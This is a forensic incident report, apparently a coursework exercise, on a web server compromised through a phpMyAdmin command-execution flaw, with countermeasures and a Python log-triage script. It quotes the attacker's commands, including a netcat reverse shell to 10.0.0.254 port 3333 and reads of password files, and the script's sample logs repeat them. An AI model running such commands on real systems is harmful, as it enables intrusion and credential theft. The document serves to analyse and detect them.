Global Software Inc.'s website was reported offline after one of the company's web servers was compromised by an attacker. The company's Managing Director (MD) asked us to investigate how the web server was attacked and who the attacker was, and to bring the compromised web server back online with appropriate countermeasures.
The manager provided us with the digital assets; the whole investigation, and every assumption in it, is based on analysis of the digital assets acquired from the network.
The digital assets were provided in three formats:
1. Network diagrams - au network diagram.jpg, eu network diagram.jpg, us network diagram.jpg, worldwide overview.jpg
2. Pcap files - au.pcap, eu.pcap, us.pcap
3. Syslog files - au.syslog, eu.syslog, us.syslog
I started the investigation by viewing the network diagrams to understand how the internal machines are configured and their IP addressing scheme. I then examined the syslog files to confirm that the Australian web server had indeed been compromised. From this analysis I concluded that the attacker first tried a series of Metasploit attacks, which were unsuccessful (see contemporaneous notes N00).
The web server was then compromised through a vulnerability in the phpMyAdmin application. The application had been installed with its default configuration in its default folder, and it also appears not to have been updated to the latest version. This allowed the attacker to exploit the phpMyAdmin arbitrary command execution vulnerability against the application.
After the successful exploitation the attacker was able to execute UNIX commands from his browser and browse the folders in the web server's directory tree (see contemporaneous notes N00-N0). It is strongly recommended to remove applications that are not in use and, where an application is needed, to update it regularly.
After the exploitation, the attacker began exploring the folders on the web server. I found that the attacker accessed /var/www/password, where password files are stored in encrypted form. My assumption is that these passwords were used to view the log entries of the LDAP server in order to obtain further useful information. I strongly recommend never storing a password file in a folder that is accessible to internal or external users.
I assume the attacker had good knowledge of the users in the Australian network associated with the web server, because once the attacker had examined the LDAP entries he was able to access client machines on the network. The logs also show that the attacker accessed the Linux password repository and copied the data into gsw_super_software.tar.gz (see contemporaneous notes N00), then downloaded that file from the server via SFTP. After acquiring passwords from the machine, the attacker used SSH to log in as each user on the network to see which systems had access to the web server.
It is strongly recommended to examine gsw_super_software.tar.gz to confirm exactly what information was lost from the server.
Once the attacker had access to the root directory, he looked at the FTP service in the home directory and confirmed that it was working by checking welcome.msg; after this he listed the backup files under /var. Finally he used the nc command from /bin to connect from the web server back to his own system over an open port, which gave him a shell on the web server whenever that connection was established.
At this point the attacker owned the whole web server. Finally he deleted all files from the web directory and terminated every system he had accessed. The web server itself stayed online because it is not configured to be shut down by other machines, so the attacker killed the web server's processes instead.
Bringing the web server back online is very important because the company has to deal with its clients. Before starting the web server it is very important to update the phpMyAdmin application to its latest version or, if the utility is not needed, to remove it.
Unwanted tools such as Nmap, netcat and SSH should be removed or, where they are necessary, protected by strong authentication and kept out of user-accessible folders. It is strongly recommended not to store any password file in its default directory; there is no need to store passwords there and doing so provides no security.
Global Software Inc.'s Australian network had a vulnerability that allowed the attacker to compromise the web server and take the website offline. From the log files I confirmed that the attacker came from the US network of the same organization. The logs show that several types of attack were tried against the web server, some of which were unsuccessful; the attack succeeded once the attacker found the vulnerability in the phpMyAdmin application installed on the web server. The technical analysis below explains in detail how the web server was compromised and gives a step-by-step account of the attacker's footprint on the Australian network.
Analysis 1: metasploit attacks
When analysing au.syslog I identified that the attacker used several Metasploit attacks against the web server, sending requests from IP address 10.0.0.254; port 3333 on that host also appears later as the callback port of the reverse shell. The attacker tried different Metasploit attacks and also tried to view the /intranet folder, which appears not to have been accessible. The attacker nevertheless kept trying various attacks. Because of the continuous attempts within a short period of time, I conclude that this was a Metasploit attack.
The PHP XML-RPC arbitrary code execution attack was the first Metasploit attack tried, against the PHP library files, and it appears to have been unsuccessful. From the start of the attacks the web server continuously rejected these exploitation attempts; it appears to have been configured securely against them, which made the attacks unsuccessful. Metasploit contains predefined exploit modules that target a specific vulnerability on a machine, and it selects the exploit according to that vulnerability; here the web server was simply not vulnerable to this attack.
Some of the Metasploit attacks attempted were:
BadBlue 2.5 EXT.dll - a stack buffer overflow that permits remote attackers to run arbitrary code through a long mfcisapicommand parameter.
Dogfood CRM spell.php - a similar kind of remote command execution attack.
HTTP 0.1 SEARCH - used to probe for a buffer overflow vulnerability.
NDS (Novell Directory Service) - a stack overflow exploit against Novell eDirectory.
Analysis 2: LDAP server attack
During analysis of the log files I found that the attacker used UNIX commands to get into /var/www/passwords, where password files are stored in encrypted form. I also found a suspicious tarball named gsw_super_software.tar.gz containing log entries from the LDAP server, which was downloaded to the attacker via SFTP. Before exploiting the phpMyAdmin vulnerability the attacker was not able to access the LDAP log index entries; once the exploitation succeeded, he had access to them. My assumption is that the password file in /var/www/passwords contains the password for the LDAP server, so that after obtaining it the attacker gained access to the LDAP server and copied the server's log entries to the system 10.0.2.10. He then used arbitrary commands from the browser to pack the contents into a tarball and downloaded /gsw_super_software.tar.gz via SFTP.
Analysis 3: phpMyAdmin vulnerability exploitation attack
Global Software Inc.'s website was reported offline because its web server was compromised. My investigation found that the attacker tried many types of attack, such as email spamming and Metasploit attacks, but none of them succeeded. Finally the attacker discovered that the phpMyAdmin application installed on the Australian web server was vulnerable because it had not been updated to its latest version. He exploited it using the phpMyAdmin arbitrary command execution vulnerability, and the successful exploitation allowed him to execute arbitrary commands from the browser window on his own system.
The attacker's exploitation is captured in the log file, where the exploit was launched and the information stored; it can be traced through the requests to /phpMyAdmin/scripts/setup.php on the web server.
After exploiting phpMyAdmin the attacker was able to execute arbitrary commands from his browser, and during analysis of the log files I found the UNIX commands he executed. Analysis of these commands reveals the attacker's intention to take down the server: before terminating the machines he had accessed, he copied all the content from those systems.
Here are the UNIX commands executed by the attacker:
cat -l /etc/passwd
ls -l /root
ls -l /home
ls -l /home/ftp
cat -l /home/ftp/welcome.msg
cat -l /var
ls -l /var
ls -l /var
ls -l /var/opt
ls -l /var/backups
ls -l /bin
/bin/nc -e /bin/sh 10.0.0.254 3333
After the exploitation the attacker used the ls command to list the directories on the web server, found /etc/passwd and looked at the account list there, then looked at /etc/shadow, where the hashed (encrypted) passwords of the server's user accounts are stored, and listed all the files. My assumption is that the attacker cracked these password hashes, obtained root access to the LDAP server, copied the log index entries into gsw_super_software.tar.gz and downloaded it to his machine via SFTP.
The last UNIX command he executed created a reverse shell on the web server, which enabled the attacker to run UNIX commands from his own system whenever the connection was established.
As a result of this investigation and the analysis of the log files, my assumption is that the attacker operated from the system 10.0.0.254 in the US network, listening on port 3333. The UNIX command /bin/nc -e /bin/sh 10.0.0.254 3333 shows the attacker using nc -e to make the web server connect out to his system on port 3333 and hand it a shell. I recommend that Global Software Inc. acquire that machine and investigate further.
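To make the log-side evidence of Analysis 1 and Analysis 3 reproducible, the following Python script is an added example (not part of the original report and not any Global Software Inc. tooling) that triages web-server request lines for the probe paths named above, the phpMyAdmin setup.php requests, shell commands injected through a web parameter, and the nc -e callback. The log lines are constructed in Apache combined format; the real au.syslog format, the timestamps and the exact shape of the exploit requests (a hypothetical "c=" parameter carrying the command) are assumptions, while the addresses 10.0.0.254 and 10.0.1.7, port 3333 and the nc command are as named in the report.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined format). The request shapes are
# assumptions made for illustration; they are not lines from au.syslog.
SAMPLE_LOG = """\
10.0.0.254 - - [12/Mar/2011:09:12:01 +1000] "POST /xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:12:05 +1000] "GET /ext.dll?mfcisapicommand=AAAAAAAA HTTP/1.1" 404 298 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:12:09 +1000] "GET /spell.php?lang=en&text=x HTTP/1.1" 404 298 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:12:13 +1000] "SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 501 298 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:12:20 +1000] "GET /intranet/ HTTP/1.1" 403 212 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:15:30 +1000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 1520 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:15:42 +1000] "GET /phpMyAdmin/config/config.inc.php?c=ls+-l+/var/backups HTTP/1.1" 200 733 "-" "Mozilla/4.0"
10.0.0.254 - - [12/Mar/2011:09:16:01 +1000] "GET /phpMyAdmin/config/config.inc.php?c=/bin/nc+-e+/bin/sh+10.0.0.254+3333 HTTP/1.1" 200 0 "-" "Mozilla/4.0"
10.0.1.7 - - [12/Mar/2011:09:16:10 +1000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) '
)

# Request paths the report attributes to the Metasploit probes and to phpMyAdmin.
PROBE_SIGNATURES = [
    ("php xmlrpc", re.compile(r"xmlrpc\.php", re.I)),
    ("badblue ext.dll", re.compile(r"ext\.dll\?.*mfcisapicommand=", re.I)),
    ("dogfood spell.php", re.compile(r"spell\.php", re.I)),
    ("phpmyadmin setup.php", re.compile(r"/phpmyadmin/scripts/setup\.php", re.I)),
]
# A shell-looking token right after "=", ";", "|", "&" or whitespace in the query string.
CMD_RE = re.compile(r"(?:^|[=;|&\s])(?:/bin/)?(?:ls|cat|nc|id|uname|sh|bash|tar|scp|sftp)(?:\s|$)")
# nc -e <shell> <host> <port>: the reverse-shell form quoted in the report.
REVERSE_SHELL_RE = re.compile(
    r"\bnc\s+(?:-\w+\s+)*-e\s+\S+\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b"
)


def triage(log_text):
    """Flag suspicious requests; return findings, per-source counts and any reverse-shell callback."""
    findings, sources, callback = [], Counter(), None
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue
        ip, ts, method, path, status = m.group("ip", "ts", "method", "path", "status")
        decoded = unquote_plus(path)
        query = decoded.split("?", 1)[1] if "?" in decoded else ""
        tags = [name for name, rx in PROBE_SIGNATURES if rx.search(decoded)]
        if method.upper() == "SEARCH" and len(path) > 16:
            tags.append("http search overflow probe")
        if CMD_RE.search(query):
            tags.append("command injection")
        rs = REVERSE_SHELL_RE.search(decoded)
        if rs:
            tags.append("reverse shell")
            callback = (rs.group("host"), int(rs.group("port")))
        if not tags:
            continue
        sources[ip] += 1
        findings.append({
            "ts": ts, "ip": ip, "status": int(status),
            "accepted": int(status) < 400,  # 4xx/5xx means the server rejected the attempt
            "tags": tags, "request": f"{method} {decoded}",
        })
    return {"findings": findings, "sources": sources, "callback": callback}


def attacker_ip(result):
    """The source that generated the most flagged requests, or None."""
    top = result["sources"].most_common(1)
    return top[0][0] if top else None


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for f in result["findings"]:
        state = "accepted" if f["accepted"] else "rejected"
        print(f["ts"], f["ip"], state, ",".join(f["tags"]), f["request"])
    print("attacker:", attacker_ip(result), "callback:", result["callback"])
```

Splitting the findings on the status code separates the rejected probes (4xx/5xx, the unsuccessful Metasploit attempts) from the requests the server actually served, which is where the compromise begins; the callback tuple is the host and port to hand to whoever acquires the 10.0.0.254 machine.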
Restarting the web server and Countermeasures
Before restarting the server it is very important to acquire the machine and examine it thoroughly for any other vulnerability that may remain on it. It is also very important to update the vulnerable phpMyAdmin application to its latest version. During the analysis I found that some machines in the other networks carried out spamming attacks, so the email server should be checked for vulnerabilities as well. Unwanted utilities such as nmap, netcat, SFTP and ssh should be removed from the user-accessible environment.
I recommend acquiring the LDAP server and examining its log index entries, which the attacker copied into gsw_super_software.tar.gz and took to his system. A strong password should be assigned to the LDAP server, passwords should never be stored in a user-accessible zone, and it is better not to store password files anywhere on the network.
The firewall configuration should be revised and tuned against current network threats, with strong firewall rules in place and unwanted ports closed. The whole network should be checked by penetration testing experts; after that, restarting the web server will be safe.
Finally, Global Software Inc.'s web server was returned to a safe condition and all backups were restored to it. The investigation and analysis revealed the cause of the attack, and countermeasures to safeguard against future attacks have been suggested. Overall, the security of the system is now under control.